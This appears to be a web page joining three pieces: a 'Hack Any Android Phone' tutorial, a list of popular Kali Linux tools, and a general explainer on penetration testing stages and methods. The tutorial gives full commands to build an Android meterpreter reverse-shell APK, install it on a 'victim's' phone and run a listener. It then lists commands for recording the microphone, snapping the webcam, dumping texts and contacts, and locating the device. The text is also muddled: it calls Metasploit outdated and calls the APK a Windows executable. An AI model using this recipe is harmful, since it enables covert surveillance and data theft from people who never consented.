Hack Any Android Phone : msfvenon - Metasploit payload generator
msfvenom is a kali linux hacking tool for android ,is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance known as msfvenom payload.
Hacking With METASPLOIT in Kali Linux is a old tool. Metasploit is enhanced by msfvenom in kali linux. Metasploit is now a outdated tool.
So, let's get started!!
STEPS :
1. Fire Up kali and open command terminal.
2. Set payload and create custom windows executable. Command:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk
(To know your LHOST, open new terminal and type ifconfig )
Your apk file is being saved in the Home folder.
Note: Don't add any stray space characters anywhere. Use the command as is (after changing the LHOST and LPORT as needed).
3. Transfer/mail this file (here andro.apk) file to the victim's phone and install it.
4. Start the metasploit framework console as follows : Command:
msfconsole
5. Now it's time to open and setup multi-handler. Follows the steps :
msf > use multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.0.110 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > exploit
Payload Handler is being started........
6. When the victims clicks on the app(installed as MAIN ACTIVITY in the menu) in his phone, meterpreter session will be established.
7. Try the following exploit commands : - record_mic - webcam_snap - webcam_stream - dump_contacts - dump_sms - geolocate ************************************************************************
Top Kali Linux Tools Every Hacker Should Know About and Learn
Hello friends how are you doing? I hope that everything is fine and you are enjoying your hacking so I thought to add a little more to your hacking skills ” Top Kali Linux Tools Every Hacker Should Know About and Learn ” these tools are most favorite tools for all the hackers and the use these tools in their day to day penetration tasks.
Most of the hacking tools are pre-included in Kali Linux by Offensive Security team. There are over 300+ tools included and this site covers those tools also and we will be creating full detailed articles about most of the tools that come with Kali Linux 2.0.
Becoming an Ethical Hacker is not as easy as to become a software developer. You will quickly realize this when you will start to learn it. To do a simple hack on your own, a hacker need to have a good understanding about multiple topic. Many people say that you should have in-depth knowledge about programming languages like C++, Python, HTL etc.. and advance Linux/Unix networking knowledge to get started in this field.
But this is not enough even if you are really good at that still there will be things that you don’t know about. The software and its security is evolving with every day so as a hacker you must keep learning we things with a really fast pace.
What is new in Kali Linux 2.0?
If you are into Network Penetration and hacking stuff then Kali Linux is the best Linux Distro out with all the tools pre-installed and just ready to be used. That eases the user to use it and it is real time saver and you can own the network
Top Kali Linux Tools:-
Now let’s get started with the list of my favorite tools and a lot of other hackers favorite tools too.
1. Metasploit:-
Metasploit is a framework for developing exploits, shellcodes, fuzzing tool, payloads etc. And it has a very vast collection of exploits and exploitation tools bundled into this single framework. It is available for all major Operating Sytems out there Windows, OS X, and Linux and comes pre-installed in Kali Linux. It is an offensive tool and to attack your own or your company’s infrastructure to check for security loopholes and to fix them before an actual attacker can break in.
Here is a Video Demo of Using Metasploit :-
It can also be used to target web applications, networks, and servers etc. You get both GUI and command line interface. There are to products for Metasploit a Free Community version and a paid Metasploit Pro.
2. Nmap (Network Mapper):-
Nmap is used to scan whole networks for open ports and for mapping networks and a lot more things. It is mainly used for scanning networks and discover the online PC’s and for security auditing. Most of the network admins use Nmap to discover online computer’s, open ports and manage services running. It uses raw IP packets in such a creative way to know what hosts are available on the network and what ports are open which services (applications name and version) are running on those systems.
It comes into version GUI and Command Line. Zenmap is the GUI version what I recommend is that first learn the command line and then move on to the GUI if you feel confident.
3. Armitage:-
Armitage is a graphical cyber attack management tool and it provides a GUI interface for all Metasploit features and makes it easier to understand and use. If you really want to understand and grow into the advanced features then Armitage is a great choice for you.
Armitage organizes Metasploit’s capabilities around the hacking process. There are features for discovery, access, post-exploitation, and maneuver.
And if you are working in a team then it can be a real help to share information with your team:
Use the same sessions
Share victim hosts, capture data, download files etc.
Communicate using a shared event log.
Run bots to automate the tasks.
4. Jhon The Ripper (JTR):-
Jhon The Ripper is a very popular tool for password cracking it is also known as JTR and also it has the coolest name of all the tools. Mostly it is simply referred as ‘Jhon’ it is the most commonly used tool for password cracking and to perform dictionary attacks. Jhon The Ripper takes text files, referred as a ‘wordlist’, which contains the list of commonly used passwords or real passwords cracked before, and it encrypts the password in the wordlist in the same way as the password which is being cracked. And then compare the output string with the encrypted string of the provided password.
This tool can be used to perform different types of dictionary attacks. If you are confused between Jhon The Ripper and THC Hydra then the most simple way to explain it is that THC Hydra is used to crack a password for online services and Jhon The Ripper is used for offline password cracking.
5. Wireshark:-
Wireshark is an open source tool for network analysis and profiling network traffic and packets and this kind of tools are referred as Network Sniffers.
Wireshark, previously known as Ethereal, is used to monitor network traffic and analyze the packets that are sent out. Wireshark can intercept network traffic ranging from connection level information to bits of the information which make up a signal packet. All of this is done in real time and show to the user in a readable format. There are a lot of developments made in the tool (platform) over the years and it includes filters, color-coding the packets depending on their information and these features really help the penetration testers to dig deeper in the network traffic and inspect the packets in detail.
Note: If you are really interested in Network administration and penetration testing then knowing how to use Wireshark is a required skill. There are a lot of resources available online from where you can learn about using Wireshark in depth.
6. THC Hydra:-
THC Hydra is another tool for password cracking and mostly Jhon The Ripper and Hydra are used hand to hand. THC Hydra also known as Hydra is really popular password cracking tool for hacking Network Login it uses both Brute Force attack as well as dictionary attacks at the login page. And it supports the wide range of network protocols like SSH, Mail (POP3, IMAP, etc.), Database, SMB, VNC, LDAP, SMB, and a whole lot of other protocols.
Here is the Video showing how to use THC Hydra:-
I would also recommend that you check out this article related to Brute Force Attacks:-
Get SSH username & Password For Any Server easily with Brute Force Attack
7. Burp Suite:-
Burp Suite is a web application penetration testers Dream tool and the most powerful tool out there on the internet can it can be used to cover everything full in depth that you ever wanted. So I will be my best to thoroughly explain all the details as there are a lot of things to cover. Here is a quick list of Burp Suite components:
Intercepting Proxy – This part of Burp lets to inspect and modify all the requests and responses that your browser make to the target application.
Spider – It is a very handy tool for listing out all the directories and files on the server and its functionality.
Web Scanner* – The important part as it detects list of vulnerabilities present in the site.
Intruder – This is used to create and perform customized attacks to find and exploit unexpected errors.
Repeater – Modify and re-send any individual requests.
Sequencer – To test the randomness of the tokens (csrf , authenticity_token etc )
Extensions* – Allow you to write and add you own custom designed plugin or download pre-made plugins, to performs complex and fully customized attacks.
* Donates those features which are only available in pro version.
Here is a helpful article explaining Burp Suite in full depth:
Burp Suite Tutorial Web Penetration Tool Kit
8. OWASP Zed:-
OWASP Zed Attack Proxy (ZAP) is also a well known Proxy tool and is a pretty good alternative for Burp Suite and the good thing is that its free and open source. And if you have read all of the above-written content than that means that you already know about this stuff a little bit and you might be familiar with what is OWASP.
And if you don’t know what OWASP is then here is a short and easy to understand OWASP is the free and open source software security community.
And if you are getting into web penetration testing then you must read the OWASP Top 10 it is ‘guide-book’ of web application security.
This tool does the job pretty good and is also easy to use program that finds vulnerabilities in web applications. What make OWASP ZAP good to use tools is because it has a lot of support from the OWASP security Community. You can use it to scan the target and run an automated scan to find vulnerabilities and you can also do manual testing like the pro style.
9. Social Engineering Toolkit:-
`
The Social-Engineering Toolkit or popularly known as SET is a really handy and useful tool in terms of that the attacks are targeted at the human element instead of the system. It have really useful features that let you send email to victims create backdoor Java applets etc and you can do really cool stuff with this. It is a command line interface and works on Linux, Mac OS X and Windows.
10. Aircrack-ng:-
Again a Password cracking tool here and this time it is used to crack Wifi password. These kind of tools are really effective if used in the right hands. For those new to this wireless-specific hacking program, Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking tool that can recover keys when sufficient data packets have been captured (in monitor mode). For those tasked with penetrating and auditing wireless networks Aircrack-ng will become your best friend.
And if you are getting into Wifi hacking and are a mediocre hacker then it will take you few minutes to crack WEP wireless password and to crack WPA/WPA2 you will have to do a lot of work.
For those who are interested in wireless hacking do check out Reaver another popular wifi hacking utility.
11. BeEF:-
BeEF is an abbreviation of The Browser Exploitation Framework it is mainly focused on the web browser based penetration testing tool. That mean’s that it takes advantage of the vulnerabilities that exist in the web application used by the victim. Mainly it take advantage of Cross Site Scripting and after the payload is executed the attacker can fully take over victims web browser.
12. Maltego:-
This tool gathers all information available about the target over the internet like emails, DNS records and many other. It can be used to gather information about individuals or either network. It is in the category of digital forensics.
Here is a complete article about how you can use Maltego:
13. Ettercap:-
It is a free and open source network security tool for man-in-the-middle attacks on LAN. It can be used to your network protocol analysis and security auditing. It is available on Windows, Unix, Linux BSD and other distros.
14. Nikto Website Vulnerability Scanner:-
Nikto is open source vulnerability scanner use to test for different vulnerabilities in web servers. The system searches against a database of over 6800 potentially dangerous files/ programs it also checks for outdated (unpatched) versions of over 1300 servers checks for bad configuration practices like multiple index files, HTTP server options and it will check to find the web server that is installed.
Final Words:-
These are not the only tools that are helpful and can be used for penetration testing there are many other tools out there that can be used for the same thing and you can get better results for your penetration testing.
A penetration test, also known as a pen test, is a simulated cyberattack against your computer system to check for exploitable vulnerabilities. In the context of web application security, penetration testing is commonly used to augment a web application firewall (WAF).
Pen testing can involve the attempted breaching of any number of application systems, (e.g., application protocol interfaces (APIs), frontend/backend servers) to uncover vulnerabilities, such as unsanitized inputs that are susceptible to code injection attacks.
Insights provided by the penetration test can be used to fine-tune your WAF security policies and patch detected vulnerabilities.
PENETRATION TESTING STAGES
The pen testing process can be broken down into five stages.
Planning and reconnaissance
The first stage involves:
Defining the scope and goals of a test, including the systems to be addressed and the testing methods to be used.
Gathering intelligence (e.g., network and domain names, mail server) to better understand how a target works and its potential vulnerabilities.
Scanning
The next step is to understand how the target application will respond to various intrusion attempts. This is typically done using:
Static analysis – Inspecting an application's code to estimate the way it behaves while running. These tools can scan the entirety of the code in a single pass.
Dynamic analysis – Inspecting an application's code in a running state. This is a more practical way of scanning, as it provides a real-time view into an application's performance.
Gaining access
This stage uses web application attacks, such as cross-site scripting, SQL injection and backdoors, to uncover a target's vulnerabilities. Testers then try and exploit these vulnerabilities, typically by escalating privileges, stealing data, intercepting traffic, etc., to understand the damage they can cause.
Maintaining access
The goal of this stage is to see if the vulnerability can be used to achieve a persistent presence in the exploited system— long enough for a bad actor to gain in-depth access. The idea is to imitate advanced persistent threats, which often remain in a system for months in order to steal an organization’s most sensitive data.
Analysis
The results of the penetration test are then compiled into a report detailing:
Specific vulnerabilities that were exploited
Sensitive data that was accessed
The amount of time the pen tester was able to remain in the system undetected
This information is analyzed by security personnel to help configure an enterprise's WAF settings and other application security solutions to patch vulnerabilities and protect against future attacks.
PENETRATION TESTING METHODS
EXTERNAL TESTING
External penetration tests target the assets of a company that are visible on the internet, e.g., the web application itself, the company website, and email and domain name servers (DNS). The goal is to gain access and extract valuable data.
INTERNAL TESTING
In an internal test, a tester with access to an application behind its firewall simulates an attack by a malicious insider. This isn't necessarily simulating a rogue employee. A common starting scenario can be an employee whose credentials were stolen due to a phishing attack.
BLIND TESTING
In a blind test, a tester is only given the name of the enterprise that's being targeted. This gives security personnel a real-time look into how an actual application assault would take place.
DOUBLE BLIND TESTING
In a double blind test, security personnel have no prior knowledge of the simulated attack. As in the real world, they won't have any time to shore up their defenses before an attempted breach.
TARGETED TESTING
In this scenario, both the tester and security personnel work together and keep each other appraised of their movements. This is a valuable training exercise that provides a security team with real-time feedback from a hacker's point of view.
PENETRATION TESTING AND WEB APPLICATION FIREWALLS
Penetration testing and WAFs are exclusive, yet mutually beneficial security measures.
For many kinds of pen testing (with the exception of blind and double blind tests), the tester is likely to use WAF data, such as logs, to locate and exploit an application's weak spots.
In turn, WAF administrators can benefit from pen testing data. After a test is completed, WAF configurations can be updated to secure against the weak spots discovered in the test.
Finally, pen testing satisfies some of the compliance requirements for security auditing procedures, including PCI DSS and SOC 2. Certain standards, such as PCI-DSS 6.6, can be satisfied only through the use of a certified WAF. Doing so, however, doesn’t make pen testing any less useful due to its aforementioned benefits and ability to improve on WAF configurations.
